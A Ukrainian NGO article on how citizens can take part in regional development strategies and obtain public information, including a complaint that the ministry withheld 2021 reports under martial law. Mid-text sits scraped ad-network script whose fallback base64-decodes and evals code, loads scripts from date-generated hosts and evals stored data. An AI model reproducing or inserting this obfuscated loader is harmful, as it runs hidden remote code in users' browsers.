Без тебе розвитку не буде

Державна Стратегія регіонального розвитку-2020 основними викликами у процесі стратегічного планування регіонів визначає:

недостатнє розуміння ключових проблем громади;визначення пріоритетів спрямованих на економічний розвиток і зростання доходів бюджету;відсутність наявних статистичних даних для здійснення соціально-економічного аналізу;недостатню активність жителів громади.

Тобто, влада не дуже розуміє потреби громад, громадяни не дуже приймають участь у донесенні владі проблем регіону та бачення подолання її проблем з виходом на подальший розвиток. Влада не дуже слухає, не дуже чує, не дуже направляє кошти платників податків на розвиток регіону. В результаті, ми маємо те, що маємо.

Бо Стратегія навіть за назвою направлена має бути саме на розвиток. Але що ми бачимо? В Стратегіях здебільшого під гаслами розвитку та міжнародного досвіду закладаються умовно вірні показники та цілі. А на рівні місцевих Програм та заходів все чомусь геть відірване від розвитку. І створюється за принципом переписування дат та роздачі підрядів своїм. Зі звітуванням у вигляді Інформації замість звітів з додатками, як того вимагає законодавство.

Наприклад, влада постійно декларує свою людиноорієнтовність. При цьому не запрошує цю людину щоб дізнатись її проблеми, не показує що запланувала для цієї людини і не розказує як, куди і з якою ефективністю витратила кошти хоча б на оте таємне благо, яке для цієї людини в тіні кабінетів запланувала. При цьому розказує про якийсь людський капітал. Не пояснюючи що це таке.

Загалом, Індекс людського розвитку (ІЛР) складається з трьох основних показників:

Тривалість життя

Рівень знань (доступність до всіх видів освіти)

Рівень життя, що описується таким показником, як валовий національний дохід.

І тут закладено і медицину, і спорт, і екологію, і школи, садочки, робочі місця, парки, умови ведення бізнесу тощо. Короче, все, що робить наше життя комфортним та захищеним. Все, що не просто задовольняє ваші базові потреби. А те, що дозволяє вільно розвиватись, планувати життя, народжувати людей, вести здоровий рівень життя та безпечно жити щоб працювати. А не навпаки.

І всі ми хочемо саме такого рівня життя. А чому ж маємо те, що маємо? Чому перед вікнами ростуть заправки, поряд облаштовуються шкідливі кар’єри, закриваються школи та лікарні, а вночі треба вдягати протигаз щоб не отруїтись викидами? І як це сприяє покращенню життя цієї людини в майбутньому, якщо зараз погіршує?

А все це має прописуватись в Стратегії розвитку того регіону, тієї громади, де мешкає ця людина. І прописуватись за участі цієї людини з дотриманням основного демократичного принципу «Нічого для нас без нас».

Як показують опитування, більше 90% людей не знають ані що це таке, ані де її хоча б почитати. Не кажучи вже про те, як прийняти участь у її створенні та реалізації.

А ми стоїмо на порозі відновлення України, яке буде відбуватись за нормативною базою стратегування. Відповідно, залучення кожного до цього процесу, це не тільки прояв демократії та робота на своє майбутнє. Це і громадський контроль, запобігання корупції та підняття прозорості та підзвітності влади. А це те, над чим нам треба працювати на шляху до ЄС та НАТО.

І починається все зі збору інформації. Тобто, з доступу до публічної інформації. Тут у нагоді буде ЗУ «Про доступ до публічної інформації» та ст.28 БК України з доступу до бюджетної інформації.

Для початку варто ознайомитись з нормативним забезпеченням процесу. Який складається з ЗУ Про засади державної регіональної політики, Постанови КМУ від 11.11.2015 № 932 та Наказу Мінрегіону 31.03.2016 № 79.

І це забезпечення, як ми виявили досить суперечливе, має корупційні чинники, колізії та внутрішні протиріччя. І пропозиції змін до якого направлено нами до суб’єктів законодавчої ініціативи та центральних органів виконавчої влади.

Далі беремо документи, що нададуть нам інформацію про стан справ сьогодні.

Більш детально тут: https://www.youtube.com/watch?v=Z3kPA8JtkVM list=PLwTfcQBCaT7KPZSkJ7tcvojLR4LdAK0Xl index=6 var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Після чого на веб-сайтах ОДА та місцевих рад відслідковуємо анонси, графіки, об’яви про процес формування/внесення змін/моніторнг/оцінку/звітування про виконання Стратегії регіонального розвитку. І розуміємо, що на всіх етапах ОДА та виконкоми місцевих рад мають залучати до роботи широкі кола громадськості. Найпоширеніший механізм- участь у робочих групах. Це дозволить безпосередньо впливати на етапі розробки проєкту Стратегії/Плану реалізації/ Плану відновлення. Або участь у консультаціях з громадськістю в електронній формі. Якщо для цього не вистачає часу чи фахових знань, можна долучитись до обговорення на етапі громадських слухань вже готового проєкту Стратегії розвитку регіону/ Плану її виконання/Плану відновлення. І якщо процесом розробки займається ОДА /виконком ради, то громадські слухання – це механізм місцевого самоврядування.

Після внесення запропонованих під час громадських слухань пропозицій до обговорюваних документів, до справи береться рада. Депутати мають розглянути та затвердити проєкт Стратегії/ Плану її виконання/Плану відновлення, звітів. Роблять вони це на засіданнях депутатських комісій та на сесіях. На засіданні яких ти маєш право бути для отримання інформації в безпосередній формі, згідно вимог ЗУ «Про доступ до публічної інформації.

На етап реалізації Плану виконання Стратегії/ Плану відновлення ти маєш право безперешкодного доступу до інформації про результати реалізації Стратегій, Планів, Програм через які вони реалізуються; та розгорнутих звітів про їх виконання. Які мають бути розміщені на веб-сайтах органів влади, так і надаватись у відповідь на запит. І оскільки це інформація про використання бюджетних коштів місцевого самоврядування, то інформація є апріорі відкритою. Бо до повноважень місцевого самоврядування не віднесено повноважень з оборони, розслідування злочинів та інших напрямків діяльності, що пов’язані з закриттям інформації.

На етапі звітування ти маєш право брати участь у моніторінгових групах ОДА чи виконкому, перевіряти результати безпосередньо.

Але, проблемою може виявитись небажання представників влади надавати можливість громадянам реалізувати свої права на доступ до публічної інформації та права на участь в управлінні державними та місцевими справами.

Як це ми побачили зі Звітами про результативність реалізації Стратегії та про результати проведення моніторингу плану заходів з реалізації Стратегій регіоанльного розвитку за 2021 рік. Які ми не побачили ані на офіційних веб-сайтах облрад, ОДА та Мінрегіону, ані отримали у відповідь на запит до Мінрегіону. Який повідомив, що у зв’язку з войною він дозволив не надсилати різні звіти щодо всього, що не стосується війни!!!!! Тобто, всі тилові питання Мінрегіон повністю не контролює вже 9-й місяць?

Своїм листом вих.№ №8/36.1/2858-22 від 30.08.2022 генеральний директор Директорату регіональної політики Міністерства розвитку громад та територій України Віктор Подорожний повідомив, що у зв’язку з прийняттям Указів Президента України від 24 лютого 2022 № 64/2022 «Про введення воєнного стану в Україні» та № 68/2022 «Про утворення військових адміністрацій» у Мінрегіоні відсутня інформація щодо виконання частини пунктів Плану заходів, відповідальними за які визначено інші центральні та місцеві органи виконавчої влади та органи місцевого самоврядування, у зв’язку з прийняттям рішення про тимчасове призупинення інформування центральних органів влади про стан виконання актів та доручень Президента України, Кабінету Міністрів України, актів міністерств, інших центральних органів виконавчої влади з питань, що не стосуються воєнного стану, військової діяльності, надання медичної допомоги, евакуації населення тощо. Передбачається, що інформування буде відновлено, а Мінрегіоном підготовлено відповідний узагальнений звіт після припинення воєнного стану.

Відповідно, регіональні органи публічної влади сприйняли це як сигнал до закриття інформації зі Звітів, строк надання до обласних рад яких був до 25 лютого 2022. Що є необгрунтованим і порушує право громадян на доступ до публічної інформації.

Порушення свого права на доступ до публічної інформації можна Уповноваженому Верховної Ради з прав людини.

Знай свої права, користуйтесь ними! Проявляй свою громадську активність. Без тебе розвитку не буде!

Активність громадян один з критерієв оцінки рівня демократії в країні.

Більше інформації в нашому відео-посібнику: https://www.youtube.com/playlist?list=PLwTfcQBCaT7KPZSkJ7tcvojLR4LdAK0Xl

Більше інформації на нашому Youtube-каналі — https://www.youtube.com/watch?v=uTM__Vw3hr8 t=607s

Та веб-сайті- www.захист.zp.ua

Статтю розроблено ГО «Народний Захист» в рамках проекту, який виконує Інститут висвітлення війни та миру (IWPR) за підтримки МЗС Королівства Норвегії.

Проєкт ГО «Народний Захист»- «Стратегічний роз-ПИЛ».

Думка та позиції, висловлені у цьому відео не обов’язково відображають позицію МЗС Королівства Норвегії та Інституту висвітлення війни та миру (IWPR). (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/bez-tebe-rozvitku-ne-bude/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top